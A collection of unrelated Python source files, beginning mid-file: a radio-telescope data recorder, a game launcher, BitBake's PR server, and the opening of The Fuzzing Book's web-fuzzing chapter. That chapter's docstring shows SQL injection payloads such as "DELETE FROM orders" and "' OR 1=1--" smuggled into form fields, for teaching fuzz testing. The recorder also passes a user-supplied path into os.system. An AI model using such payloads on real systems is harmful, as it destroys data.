igulp_size = self.ntime_gulp*nbeam*nchan*npol*4 # float32
ishape = (self.ntime_gulp,nbeam,nchan,npol)
frange = (numpy.arange(nchan) + chan0) * CHAN_BW
last_save = 0.0
prev_time = time.time()
iseq_spans = iseq.read(igulp_size)
for ispan in iseq_spans:
if ispan.size < igulp_size:
continue # Ignore final gulp
curr_time = time.time()
acquire_time = curr_time - prev_time
prev_time = curr_time
## Setup and load
idata = ispan.data_view(numpy.float32).reshape(ishape)
if time.time() - last_save > 60:
## Timestamp
tt = LWATime(time_tag, format='timetag')
ts = tt.datetime.strftime('%y%m%d %H:%M:%S')
## Average over time
sdata = idata.mean(axis=0)
## Create a diagnostic plot after suming the flags across polarization
ax.cla()
ax.plot(frange/1e6, numpy.log10(sdata[0,:,0])*10, color='#1F77B4')
ax.plot(frange/1e6, numpy.log10(sdata[0,:,1])*10, color='#FF7F0E')
ax.set_xlim((frange[0]/1e6,frange[-1]/1e6))
ax.set_xlabel('Frequency [MHz]')
ax.set_ylabel('Power [arb. dB]')
ax.xaxis.set_major_locator(MultipleLocator(base=10.0))
fig.tight_layout()
## Save
tt = LWATime(time_tag, format='timetag')
mp = ImageMonitorPoint.from_figure(fig)
self.client.write_monitor_point('diagnostics/spectra',
mp, timestamp=tt.unix)
if True:
## Save again, this time to disk
mjd, dt = tt.mjd, tt.datetime
mjd = int(mjd)
h, m, s = dt.hour, dt.minute, dt.second
filename = '%06i_%02i%02i%02i.png' % (mjd, h, m, s)
mp.to_file(filename)
last_save = time.time()
time_tag += navg * self.ntime_gulp * (int(FS) // int(CHAN_BW))
curr_time = time.time()
process_time = curr_time - prev_time
prev_time = curr_time
self.perf_proclog.update({'acquire_time': acquire_time,
'reserve_time': -1,
'process_time': process_time,})
self.log.info("SpectraOp - Done")
class StatisticsOp(object):
def __init__(self, log, id, iring, ntime_gulp=250, guarantee=True, core=None):
self.log = log
self.iring = iring
self.ntime_gulp = ntime_gulp
self.guarantee = guarantee
self.core = core
self.client = Client(id)
self.bind_proclog = ProcLog(type(self).__name__+"/bind")
self.in_proclog = ProcLog(type(self).__name__+"/in")
self.size_proclog = ProcLog(type(self).__name__+"/size")
self.sequence_proclog = ProcLog(type(self).__name__+"/sequence0")
self.perf_proclog = ProcLog(type(self).__name__+"/perf")
self.in_proclog.update( {'nring':1, 'ring0':self.iring.name})
self.size_proclog.update({'nseq_per_gulp': self.ntime_gulp})
def main(self):
if self.core is not None:
cpu_affinity.set_core(self.core)
self.bind_proclog.update({'ncore': 1,
'core0': cpu_affinity.get_core(),})
for iseq in self.iring.read(guarantee=self.guarantee):
ihdr = json.loads(iseq.header.tostring())
self.sequence_proclog.update(ihdr)
self.log.info("Statistics: Start of new sequence: %s", str(ihdr))
# Setup the ring metadata and gulp sizes
time_tag = ihdr['time_tag']
navg = ihdr['navg']
nbeam = ihdr['nbeam']
chan0 = ihdr['chan0']
nchan = ihdr['nchan']
chan_bw = ihdr['bw'] / nchan
npol = ihdr['npol']
pols = ihdr['pols']
igulp_size = self.ntime_gulp*nbeam*nchan*npol*4 # float32
ishape = (self.ntime_gulp,nbeam,nchan,npol)
data_pols = pols.split(',')
last_save = 0.0
prev_time = time.time()
iseq_spans = iseq.read(igulp_size)
for ispan in iseq_spans:
if ispan.size < igulp_size:
continue # Ignore final gulp
curr_time = time.time()
acquire_time = curr_time - prev_time
prev_time = curr_time
## Setup and load
idata = ispan.data_view(numpy.float32).reshape(ishape)
idata = idata.reshape(-1, npol)
if time.time() - last_save > 60:
## Timestamp
tt = LWATime(time_tag, format='timetag')
ts = tt.unix
## Run the statistics over all times/channels
## * only really works for nbeam=1
data_min = numpy.min(idata, axis=0)
data_max = numpy.max(idata, axis=0)
data_avg = numpy.mean(idata, axis=0)
## Save
for data,name in zip((data_min,data_avg,data_max), ('min','avg','max')):
value = MultiMonitorPoint(data.tolist(), timestamp=ts, field=data_pols)
self.client.write_monitor_point('statistics/%s' % name, value)
last_save = time.time()
time_tag += navg * self.ntime_gulp * (int(FS) // int(CHAN_BW))
curr_time = time.time()
process_time = curr_time - prev_time
prev_time = curr_time
self.perf_proclog.update({'acquire_time': acquire_time,
'reserve_time': -1,
'process_time': process_time,})
self.log.info("StatisticsOp - Done")
class WriterOp(object):
def __init__(self, log, iring, ntime_gulp=250, guarantee=True, core=None):
self.log = log
self.iring = iring
self.ntime_gulp = ntime_gulp
self.guarantee = guarantee
self.core = core
self.bind_proclog = ProcLog(type(self).__name__+"/bind")
self.in_proclog = ProcLog(type(self).__name__+"/in")
self.size_proclog = ProcLog(type(self).__name__+"/size")
self.sequence_proclog = ProcLog(type(self).__name__+"/sequence0")
self.perf_proclog = ProcLog(type(self).__name__+"/perf")
self.in_proclog.update( {'nring':1, 'ring0':self.iring.name})
self.size_proclog.update({'nseq_per_gulp': self.ntime_gulp})
def main(self):
global QUEUE
if self.core is not None:
cpu_affinity.set_core(self.core)
self.bind_proclog.update({'ncore': 1,
'core0': cpu_affinity.get_core(),})
for iseq in self.iring.read(guarantee=self.guarantee):
ihdr = json.loads(iseq.header.tostring())
self.sequence_proclog.update(ihdr)
self.log.info("Writer: Start of new sequence: %s", str(ihdr))
# Setup the ring metadata and gulp sizes
time_tag = ihdr['time_tag']
navg = ihdr['navg']
nbeam = ihdr['nbeam']
chan0 = ihdr['chan0']
nchan = ihdr['nchan']
chan_bw = ihdr['bw'] / nchan
npol = ihdr['npol']
pols = ihdr['pols']
pols = pols.replace('CR', 'XY_real')
pols = pols.replace('CI', 'XY_imag')
igulp_size = self.ntime_gulp*nbeam*nchan*npol*4 # float32
ishape = (self.ntime_gulp,nbeam,nchan,npol)
self.iring.resize(igulp_size, 10*igulp_size)
first_gulp = True
was_active = False
prev_time = time.time()
iseq_spans = iseq.read(igulp_size)
for ispan in iseq_spans:
if ispan.size < igulp_size:
continue # Ignore final gulp
curr_time = time.time()
acquire_time = curr_time - prev_time
prev_time = curr_time
## On our first span, update the pipeline lag for the queue
## so that we start recording at the right times
if first_gulp:
QUEUE.update_lag(LWATime(time_tag, format='timetag').datetime)
self.log.info("Current pipeline lag is %s", QUEUE.lag)
first_gulp = False
## Setup and load
idata = ispan.data_view(numpy.float32).reshape(ishape)
## Determine what to do
if QUEUE.active is not None:
### Recording active - write
if not QUEUE.active.is_started:
self.log.info("Started operation - %s", QUEUE.active)
QUEUE.active.start(1, chan0, navg, nchan, chan_bw, npol, pols)
was_active = True
QUEUE.active.write(time_tag, idata)
elif was_active:
### Recording just finished - clean
#### Clean
was_active = False
QUEUE.clean()
#### Close
self.log.info("Ended operation - %s", QUEUE.previous)
QUEUE.previous.stop()
time_tag += navg * self.ntime_gulp * (int(FS) // int(CHAN_BW))
curr_time = time.time()
process_time = curr_time - prev_time
prev_time = curr_time
self.perf_proclog.update({'acquire_time': acquire_time,
'reserve_time': -1,
'process_time': process_time,})
self.log.info("WriterOp - Done")
def main(argv):
parser = argparse.ArgumentParser(
description="Data recorder for power beams"
)
parser.add_argument('-a', '--address', type=str, default='127.0.0.1',
help='IP address to listen to')
parser.add_argument('-p', '--port', type=int, default=10000,
help='UDP port to receive data on')
parser.add_argument('-o', '--offline', action='store_true',
help='run in offline using the specified file to read from')
parser.add_argument('-b', '--beam', type=int, default=1,
help='beam to receive data for')
parser.add_argument('-c', '--cores', type=str, default='0,1,2,3',
help='comma separated list of cores to bind to')
parser.add_argument('-g', '--gulp-size', type=int, default=1000,
help='gulp size for ring buffers')
parser.add_argument('-l', '--logfile', type=str,
help='file to write logging to')
parser.add_argument('-r', '--record-directory', type=str, default=os.path.abspath('.'),
help='directory to save recorded files to')
parser.add_argument('-q', '--record-directory-quota', type=quota_size, default=0,
help='quota for the recording directory, 0 disables the quota')
parser.add_argument('-f', '--fork', action='store_true',
help='fork and run in the background')
args = parser.parse_args()
# Fork, if requested
if args.fork:
stderr = '/tmp/%s_%i.stderr' % (os.path.splitext(os.path.basename(__file__))[0], tuning)
daemonize(stdin='/dev/null', stdout='/dev/null', stderr=stderr)
# Setup logging
log = logging.getLogger(__name__)
logFormat = logging.Formatter('%(asctime)s [%(levelname)-8s] %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
logFormat.converter = time.gmtime
if args.logfile is None:
logHandler = logging.StreamHandler(sys.stdout)
else:
logHandler = LogFileHandler(args.logfile)
logHandler.setFormatter(logFormat)
log.addHandler(logHandler)
log.setLevel(logging.DEBUG)
log.info("Starting %s with PID %i", os.path.basename(__file__), os.getpid())
log.info("Cmdline args:")
for arg in vars(args):
log.info(" %s: %s", arg, getattr(args, arg))
# Setup the subsystem ID
mcs_id = 'dr%i' % args.beam
# Setup the cores and GPUs to use
cores = [int(v, 10) for v in args.cores.split(',')]
log.info("CPUs: %s", ' '.join([str(v) for v in cores]))
# Setup the socket, if needed
isock = None
if not args.offline:
iaddr = Address(args.address, args.port)
isock = UDPSocket()
isock.bind(iaddr)
# Setup the rings
capture_ring = Ring(name="capture")
write_ring = Ring(name="write")
# Setup the recording directory, if needed
if not os.path.exists(args.record_directory):
status = os.system('mkdir -p %s' % args.record_directory)
if status != 0:
raise RuntimeError("Unable to create directory: %s" % args.record_directory)
else:
if not os.path.isdir(os.path.realpath(args.record_directory)):
raise RuntimeError("Cannot record to a non-directory: %s" % args.record_directory)
# Setup the blocks
ops = []
if args.offline:
ops.append(DummyOp(log, isock, capture_ring, NPIPELINE,
ntime_gulp=args.gulp_size, slot_ntime=1000, core=cores.pop(0)))
else:
ops.append(CaptureOp(log, isock, capture_ring, NPIPELINE,
ntime_gulp=args.gulp_size, slot_ntime=1000, core=cores.pop(0)))
ops.append(SpectraOp(log, mcs_id, capture_ring,
ntime_gulp=args.gulp_size, core=cores.pop(0)))
ops.append(StatisticsOp(log, mcs_id, capture_ring,
ntime_gulp=args.gulp_size, core=cores.pop(0)))
ops.append(WriterOp(log, capture_ring,
ntime_gulp=args.gulp_size, core=cores.pop(0)))
ops.append(GlobalLogger(log, mcs_id, args, QUEUE, quota=args.record_directory_quota))
ops.append(PowerBeamCommandProcessor(log, mcs_id, args.record_directory, QUEUE))
# Setup the threads
threads = [threading.Thread(target=op.main) for op in ops]
# Setup signal handling
shutdown_event = setup_signal_handling(ops)
ops[0].shutdown_event = shutdown_event
ops[-2].shutdown_event = shutdown_event
ops[-1].shutdown_event = shutdown_event
# Launch!
log.info("Launching %i thread(s)", len(threads))
for thread in threads:
#thread.daemon = True
thread.start()
t_now = LWATime(datetime.utcnow() + timedelta(seconds=15), format='datetime', scale='utc')
mjd_now = int(t_now.mjd)
mpm_now = int((t_now.mjd - mjd_now)*86400.0*1000.0)
c = Client()
r = c.send_command(mcs_id, 'record',
start_mjd=mjd_now, start_mpm=mpm_now, duration_ms=30*1000,
time_avg=250)
print('III', r)
while not shutdown_event.is_set():
signal.pause()
log.info("Shutdown, waiting for threads to join")
for thread in threads:
thread.join()
log.info("All done")
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
|
main.py | import json
import os
import sys
import threading
import modules.ui
import modules.engine
import modules.networking
import modules.editor
import modules.netclients
class App:
def __init__(self):
self.editor = None
self.game = None
self.client = None
self.server = None
self.ui = None
if not os.path.isfile(os.path.join(sys.path[0], 'user', 'config.json')):
with open(os.path.join(sys.path[0], 'user', 'default_config.json'), 'r') as file:
with open(os.path.join(sys.path[0], 'user', 'config.json'), 'w') as writeto_file:
writeto_file.write(file.read())
if not os.path.isfile(os.path.join(sys.path[0], 'user', 'debug.json')):
with open(os.path.join(sys.path[0], 'user', 'default_debug.json'), 'r') as file:
with open(os.path.join(sys.path[0], 'user', 'debug.json'), 'w') as writeto_file:
writeto_file.write(file.read())
self.ui = modules.ui.UI(autostart = False)
threading.Thread(target = self.initialise_ui).start()
self.ui.tkthread()
def initialise_ui(self):
self.ui.wait_for_checkin()
with open(os.path.join(sys.path[0], 'user', 'config.json'), 'r') as file:
settingsdata = json.load(file)
self.ui.load('menu')
self.ui.set_base_title('Hydrophobes')
self.ui.set_geometry('{}x{}'.format(*settingsdata['graphics']['resolution']))
if settingsdata['default window state'] in [0, 1]:
self.ui.root.state(['normal', 'zoomed'][settingsdata['default window state']])
self.ui.root.attributes('-fullscreen', False)
else:
self.ui.root.attributes('-fullscreen', True)
self.ui.set_trigger('connect to server', self.connect_to_server)
self.ui.set_trigger('create game object', self.create_game_object)
self.ui.set_trigger('window closed', self.on_window_close)
self.ui.set_trigger('close game', self.close_game)
self.ui.set_trigger('edit map', self.map_edit)
self.ui.set_trigger('new map', self.map_make_new)
self.ui.set_trigger('start editor', self.start_editor)
self.ui.set_trigger('close editor', self.close_editor)
self.ui.set_trigger('quit', self.close)
self.ui.set_trigger('host server', self.host_server)
self.ui.set_trigger('close server', self.close_server)
self.ui.set_trigger('request client', self.get_network_client)
def connect_to_server(self, server_data):
with open(os.path.join(sys.path[0], 'user', 'config.json'), 'r') as file:
settingsdata = json.load(file)
with open(os.path.join(sys.path[0], 'server', 'config.json'), 'r') as file:
serversettingsdata = json.load(file)
if server_data['internal']:
if server_data['port'] == 'normal':
self.server = modules.networking.Server(serversettingsdata['network']['port'])
else:
self.server = modules.networking.Server(server_data['port'])
if server_data['port'] == 'normal':
server_data['port'] = settingsdata['network']['default port']
self.client = modules.netclients.Client(server_data, self.ui)
self.ui.load('server connected')
def host_server(self, console_frame):
with open(os.path.join(sys.path[0], 'server', 'config.json'), 'r') as file:
serversettingsdata = json.load(file)
self.server = modules.networking.Server(serversettingsdata['network']['port'], console_frame)
def close_server(self):
pass
def create_game_object(self, canvas):
self.game = modules.engine.Game(canvas, self.client, self.ui)
def close_game(self):
self.game.close()
def map_edit(self, map_name):
self.editor_mapname = map_name
self.ui.load('editor')
def map_make_new(self, map_name):
pass
def start_editor(self, page):
self.editor = modules.editor.Editor(page)
self.editor.load(self.editor_mapname)
def close_editor(self):
self.editor.close()
def on_window_close(self):
with open(os.path.join(sys.path[0], 'user', 'config.json'), 'r') as file:
settingsdata = json.load(file)
if settingsdata['force close']: #recommended - not all threads close when this is turned off (hopefully this will be fixed in the future)
os._exit(0)
else:
sys.exit(0)
def get_network_client(self):
return self.client
def close(self):
self.ui.root.destroy()
self.on_window_close()
if __name__ == '__main__':
App() |
serv.py | import os,sys,logging
import signal, time
from xmlrpc.server import SimpleXMLRPCServer, SimpleXMLRPCRequestHandler
import threading
import queue
import socket
import io
import sqlite3
import bb.server.xmlrpcclient
import prserv
import prserv.db
import errno
import select
logger = logging.getLogger("BitBake.PRserv")
if sys.hexversion < 0x020600F0:
print("Sorry, python 2.6 or later is required.")
sys.exit(1)
class Handler(SimpleXMLRPCRequestHandler):
def _dispatch(self,method,params):
try:
value=self.server.funcs[method](*params)
except:
import traceback
traceback.print_exc()
raise
return value
PIDPREFIX = "/tmp/PRServer_%s_%s.pid"
singleton = None
class PRServer(SimpleXMLRPCServer):
def __init__(self, dbfile, logfile, interface, daemon=True):
''' constructor '''
try:
SimpleXMLRPCServer.__init__(self, interface,
logRequests=False, allow_none=True)
except socket.error:
ip=socket.gethostbyname(interface[0])
port=interface[1]
msg="PR Server unable to bind to %s:%s\n" % (ip, port)
sys.stderr.write(msg)
raise PRServiceConfigError
self.dbfile=dbfile
self.daemon=daemon
self.logfile=logfile
self.working_thread=None
self.host, self.port = self.socket.getsockname()
self.pidfile=PIDPREFIX % (self.host, self.port)
self.register_function(self.getPR, "getPR")
self.register_function(self.quit, "quit")
self.register_function(self.ping, "ping")
self.register_function(self.export, "export")
self.register_function(self.dump_db, "dump_db")
self.register_function(self.importone, "importone")
self.register_introspection_functions()
self.quitpipein, self.quitpipeout = os.pipe()
self.requestqueue = queue.Queue()
self.handlerthread = threading.Thread(target = self.process_request_thread)
self.handlerthread.daemon = False
def process_request_thread(self):
"""Same as in BaseServer but as a thread.
In addition, exception handling is done here.
"""
iter_count = 1
# 60 iterations between syncs or sync if dirty every ~30 seconds
iterations_between_sync = 60
bb.utils.set_process_name("PRServ Handler")
while not self.quitflag:
try:
(request, client_address) = self.requestqueue.get(True, 30)
except queue.Empty:
self.table.sync_if_dirty()
continue
if request is None:
continue
try:
self.finish_request(request, client_address)
self.shutdown_request(request)
iter_count = (iter_count + 1) % iterations_between_sync
if iter_count == 0:
self.table.sync_if_dirty()
except:
self.handle_error(request, client_address)
self.shutdown_request(request)
self.table.sync()
self.table.sync_if_dirty()
def sigint_handler(self, signum, stack):
if self.table:
self.table.sync()
def sigterm_handler(self, signum, stack):
if self.table:
self.table.sync()
self.quit()
self.requestqueue.put((None, None))
def process_request(self, request, client_address):
self.requestqueue.put((request, client_address))
def export(self, version=None, pkgarch=None, checksum=None, colinfo=True):
try:
return self.table.export(version, pkgarch, checksum, colinfo)
except sqlite3.Error as exc:
logger.error(str(exc))
return None
def dump_db(self):
"""
Returns a script (string) that reconstructs the state of the
entire database at the time this function is called. The script
language is defined by the backing database engine, which is a
function of server configuration.
Returns None if the database engine does not support dumping to
script or if some other error is encountered in processing.
"""
buff = io.StringIO()
try:
self.table.sync()
self.table.dump_db(buff)
return buff.getvalue()
except Exception as exc:
logger.error(str(exc))
return None
finally:
buff.close()
def importone(self, version, pkgarch, checksum, value):
return self.table.importone(version, pkgarch, checksum, value)
def ping(self):
return not self.quitflag
def getinfo(self):
return (self.host, self.port)
def getPR(self, version, pkgarch, checksum):
try:
return self.table.getValue(version, pkgarch, checksum)
except prserv.NotFoundError:
logger.error("can not find value for (%s, %s)",version, checksum)
return None
except sqlite3.Error as exc:
logger.error(str(exc))
return None
def quit(self):
self.quitflag=True
os.write(self.quitpipeout, b"q")
os.close(self.quitpipeout)
return
def work_forever(self,):
self.quitflag = False
# This timeout applies to the poll in TCPServer, we need the select
# below to wake on our quit pipe closing. We only ever call into handle_request
# if there is data there.
self.timeout = 0.01
bb.utils.set_process_name("PRServ")
# DB connection must be created after all forks
self.db = prserv.db.PRData(self.dbfile)
self.table = self.db["PRMAIN"]
logger.info("Started PRServer with DBfile: %s, IP: %s, PORT: %s, PID: %s" %
(self.dbfile, self.host, self.port, str(os.getpid())))
self.handlerthread.start()
while not self.quitflag:
ready = select.select([self.fileno(), self.quitpipein], [], [], 30)
if self.quitflag:
break
if self.fileno() in ready[0]:
self.handle_request()
self.handlerthread.join()
self.db.disconnect()
logger.info("PRServer: stopping...")
self.server_close()
os.close(self.quitpipein)
return
def start(self):
if self.daemon:
pid = self.daemonize()
else:
pid = self.fork()
self.pid = pid
# Ensure both the parent sees this and the child from the work_forever log entry above
logger.info("Started PRServer with DBfile: %s, IP: %s, PORT: %s, PID: %s" %
(self.dbfile, self.host, self.port, str(pid)))
def delpid(self):
os.remove(self.pidfile)
def daemonize(self):
"""
See Advanced Programming in the UNIX, Sec 13.3
"""
try:
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
#parent return instead of exit to give control
return pid
except OSError as e:
raise Exception("%s [%d]" % (e.strerror, e.errno))
os.setsid()
"""
fork again to make sure the daemon is not session leader,
which prevents it from acquiring controlling terminal
"""
try:
pid = os.fork()
if pid > 0: #parent
os._exit(0)
except OSError as e:
raise Exception("%s [%d]" % (e.strerror, e.errno))
self.cleanup_handles()
os._exit(0)
def fork(self):
try:
pid = os.fork()
if pid > 0:
return pid
except OSError as e:
raise Exception("%s [%d]" % (e.strerror, e.errno))
bb.utils.signal_on_parent_exit("SIGTERM")
self.cleanup_handles()
os._exit(0)
def cleanup_handles(self):
signal.signal(signal.SIGINT, self.sigint_handler)
signal.signal(signal.SIGTERM, self.sigterm_handler)
os.chdir("/")
sys.stdout.flush()
sys.stderr.flush()
# We could be called from a python thread with io.StringIO as
# stdout/stderr or it could be 'real' unix fd forking where we need
# to physically close the fds to prevent the program launching us from
# potentially hanging on a pipe. Handle both cases.
si = open('/dev/null', 'r')
try:
os.dup2(si.fileno(),sys.stdin.fileno())
except (AttributeError, io.UnsupportedOperation):
sys.stdin = si
so = open(self.logfile, 'a+')
try:
os.dup2(so.fileno(),sys.stdout.fileno())
except (AttributeError, io.UnsupportedOperation):
sys.stdout = so
try:
os.dup2(so.fileno(),sys.stderr.fileno())
except (AttributeError, io.UnsupportedOperation):
sys.stderr = so
# Clear out all log handlers prior to the fork() to avoid calling
# event handlers not part of the PRserver
for logger_iter in logging.Logger.manager.loggerDict.keys():
logging.getLogger(logger_iter).handlers = []
# Ensure logging makes it to the logfile
streamhandler = logging.StreamHandler()
streamhandler.setLevel(logging.DEBUG)
formatter = bb.msg.BBLogFormatter("%(levelname)s: %(message)s")
streamhandler.setFormatter(formatter)
logger.addHandler(streamhandler)
# write pidfile
pid = str(os.getpid())
pf = open(self.pidfile, 'w')
pf.write("%s\n" % pid)
pf.close()
self.work_forever()
self.delpid()
class PRServSingleton(object):
def __init__(self, dbfile, logfile, interface):
self.dbfile = dbfile
self.logfile = logfile
self.interface = interface
self.host = None
self.port = None
def start(self):
self.prserv = PRServer(self.dbfile, self.logfile, self.interface, daemon=False)
self.prserv.start()
self.host, self.port = self.prserv.getinfo()
def getinfo(self):
return (self.host, self.port)
class PRServerConnection(object):
def __init__(self, host, port):
if is_local_special(host, port):
host, port = singleton.getinfo()
self.host = host
self.port = port
self.connection, self.transport = bb.server.xmlrpcclient._create_server(self.host, self.port)
def terminate(self):
try:
logger.info("Terminating PRServer...")
self.connection.quit()
except Exception as exc:
sys.stderr.write("%s\n" % str(exc))
def getPR(self, version, pkgarch, checksum):
return self.connection.getPR(version, pkgarch, checksum)
def ping(self):
return self.connection.ping()
def export(self,version=None, pkgarch=None, checksum=None, colinfo=True):
return self.connection.export(version, pkgarch, checksum, colinfo)
def dump_db(self):
return self.connection.dump_db()
def importone(self, version, pkgarch, checksum, value):
return self.connection.importone(version, pkgarch, checksum, value)
def getinfo(self):
return self.host, self.port
def start_daemon(dbfile, host, port, logfile):
ip = socket.gethostbyname(host)
pidfile = PIDPREFIX % (ip, port)
try:
pf = open(pidfile,'r')
pid = int(pf.readline().strip())
pf.close()
except IOError:
pid = None
if pid:
sys.stderr.write("pidfile %s already exist. Daemon already running?\n"
% pidfile)
return 1
server = PRServer(os.path.abspath(dbfile), os.path.abspath(logfile), (ip,port))
server.start()
# Sometimes, the port (i.e. localhost:0) indicated by the user does not match with
# the one the server actually is listening, so at least warn the user about it
_,rport = server.getinfo()
if port != rport:
sys.stdout.write("Server is listening at port %s instead of %s\n"
% (rport,port))
return 0
def stop_daemon(host, port):
import glob
ip = socket.gethostbyname(host)
pidfile = PIDPREFIX % (ip, port)
try:
pf = open(pidfile,'r')
pid = int(pf.readline().strip())
pf.close()
except IOError:
pid = None
if not pid:
# when server starts at port=0 (i.e. localhost:0), server actually takes another port,
# so at least advise the user which ports the corresponding server is listening
ports = []
portstr = ""
for pf in glob.glob(PIDPREFIX % (ip,'*')):
bn = os.path.basename(pf)
root, _ = os.path.splitext(bn)
ports.append(root.split('_')[-1])
if len(ports):
portstr = "Wrong port? Other ports listening at %s: %s" % (host, ' '.join(ports))
sys.stderr.write("pidfile %s does not exist. Daemon not running? %s\n"
% (pidfile,portstr))
return 1
try:
PRServerConnection(ip, port).terminate()
except:
logger.critical("Stop PRService %s:%d failed" % (host,port))
try:
if pid:
wait_timeout = 0
print("Waiting for pr-server to exit.")
while is_running(pid) and wait_timeout < 50:
time.sleep(0.1)
wait_timeout += 1
if is_running(pid):
print("Sending SIGTERM to pr-server.")
os.kill(pid,signal.SIGTERM)
time.sleep(0.1)
if os.path.exists(pidfile):
os.remove(pidfile)
except OSError as e:
err = str(e)
if err.find("No such process") <= 0:
raise e
return 0
def is_running(pid):
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
return False
return True
def is_local_special(host, port):
if host.strip().upper() == 'localhost'.upper() and (not port):
return True
else:
return False
class PRServiceConfigError(Exception):
pass
def auto_start(d):
global singleton
# Shutdown any existing PR Server
auto_shutdown()
host_params = list(filter(None, (d.getVar('PRSERV_HOST') or '').split(':')))
if not host_params:
return None
if len(host_params) != 2:
logger.critical('\n'.join(['PRSERV_HOST: incorrect format',
'Usage: PRSERV_HOST = "<hostname>:<port>"']))
raise PRServiceConfigError
if is_local_special(host_params[0], int(host_params[1])) and not singleton:
import bb.utils
cachedir = (d.getVar("PERSISTENT_DIR") or d.getVar("CACHE"))
if not cachedir:
logger.critical("Please set the 'PERSISTENT_DIR' or 'CACHE' variable")
raise PRServiceConfigError
bb.utils.mkdirhier(cachedir)
dbfile = os.path.join(cachedir, "prserv.sqlite3")
logfile = os.path.join(cachedir, "prserv.log")
singleton = PRServSingleton(os.path.abspath(dbfile), os.path.abspath(logfile), ("localhost",0))
singleton.start()
if singleton:
host, port = singleton.getinfo()
else:
host = host_params[0]
port = int(host_params[1])
try:
connection = PRServerConnection(host,port)
connection.ping()
realhost, realport = connection.getinfo()
return str(realhost) + ":" + str(realport)
except Exception:
logger.critical("PRservice %s:%d not available" % (host, port))
raise PRServiceConfigError
def auto_shutdown():
global singleton
if singleton:
host, port = singleton.getinfo()
try:
PRServerConnection(host, port).terminate()
except:
logger.critical("Stop PRService %s:%d failed" % (host,port))
try:
os.waitpid(singleton.prserv.pid, 0)
except ChildProcessError:
pass
singleton = None
def ping(host, port):
conn=PRServerConnection(host, port)
return conn.ping()
|
WebFuzzer.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# "Testing Web Applications" - a chapter of "The Fuzzing Book"
# Web site: https://www.fuzzingbook.org/html/WebFuzzer.html
# Last change: 2022-02-03 14:31:04+01:00
#
# Copyright (c) 2021 CISPA Helmholtz Center for Information Security
# Copyright (c) 2018-2020 Saarland University, authors, and contributors
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
r'''
The Fuzzing Book - Testing Web Applications
This file can be _executed_ as a script, running all experiments:
$ python WebFuzzer.py
or _imported_ as a package, providing classes, functions, and constants:
>>> from fuzzingbook.WebFuzzer import <identifier>
but before you do so, _read_ it and _interact_ with it at:
https://www.fuzzingbook.org/html/WebFuzzer.html
This chapter provides a simple (and vulnerable) Web server and two experimental fuzzers that are applied to it.
### Fuzzing Web Forms
`WebFormFuzzer` demonstrates how to interact with a Web form. Given a URL with a Web form, it automatically extracts a grammar that produces a URL; this URL contains values for all form elements. Support is limited to GET forms and a subset of HTML form elements.
Here's the grammar extracted for our vulnerable Web server:
>>> web_form_fuzzer = WebFormFuzzer(httpd_url)
>>> web_form_fuzzer.grammar['']
['?']
>>> web_form_fuzzer.grammar['']
['/order']
>>> web_form_fuzzer.grammar['']
['&&&&&&']
Using it for fuzzing yields a path with all form values filled; accessing this path acts like filling out and submitting the form.
>>> web_form_fuzzer.fuzz()
'/order?item=lockset&name=%43+&email=+c%40_+c&city=%37b_4&zip=5&terms=on&submit='
Repeated calls to `WebFormFuzzer.fuzz()` invoke the form again and again, each time with different (fuzzed) values.
Internally, `WebFormFuzzer` builds on a helper class named `HTMLGrammarMiner`; you can extend its functionality to include more features.
### SQL Injection Attacks
`SQLInjectionFuzzer` is an experimental extension of `WebFormFuzzer` whose constructor takes an additional _payload_ – an SQL command to be injected and executed on the server. Otherwise, it is used like `WebFormFuzzer`:
>>> sql_fuzzer = SQLInjectionFuzzer(httpd_url, "DELETE FROM orders")
>>> sql_fuzzer.fuzz()
"/order?item=lockset&name=+&email=0%404&city=+'+)%3b+DELETE+FROM+orders%3b+--&zip='+OR+1%3d1--'&terms=on&submit="
As you can see, the path to be retrieved contains the payload encoded into one of the form field values.
Internally, `SQLInjectionFuzzer` builds on a helper class named `SQLInjectionGrammarMiner`; you can extend its functionality to include more features.
`SQLInjectionFuzzer` is a proof-of-concept on how to build a malicious fuzzer; you should study and extend its code to make actual use of it.
For more details, source, and documentation, see
"The Fuzzing Book - Testing Web Applications"
at https://www.fuzzingbook.org/html/WebFuzzer.html
'''
# Allow to use 'from . import <module>' when run as script (cf. PEP 366)
if __name__ == '__main__' and __package__ is None:
__package__ = 'fuzzingbook'
# Testing Web Applications
# ========================
if __name__ == '__main__':
print('# Testing Web Applications')
if __name__ == '__main__':
from .bookutils import YouTubeVideo
YouTubeVideo('5agY5kg8Pvk')
## Synopsis
## --------
if __name__ == '__main__':
print('\n## Synopsis')
## A Web User Interface
## --------------------
if __name__ == '__main__':
print('\n## A Web User Interface')
### Excursion: Implementing a Web Server
if __name__ == '__main__':
print('\n### Excursion: Implementing a Web Server')
from http.server import HTTPServer, BaseHTTPRequestHandler
from http.server import HTTPStatus # type: ignore
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
"""A simple HTTP server"""
pass
#### Taking Orders
if __name__ == '__main__':
print('\n#### Taking Orders')
if __name__ == '__main__':
# We use the same fixed seed as the notebook to ensure consistency
import random
random.seed(2001)
from typing import NoReturn, Tuple, Dict, List, Optional, Union
FUZZINGBOOK_SWAG = {
"tshirt": "One FuzzingBook T-Shirt",
"drill": "One FuzzingBook Rotary Hammer",
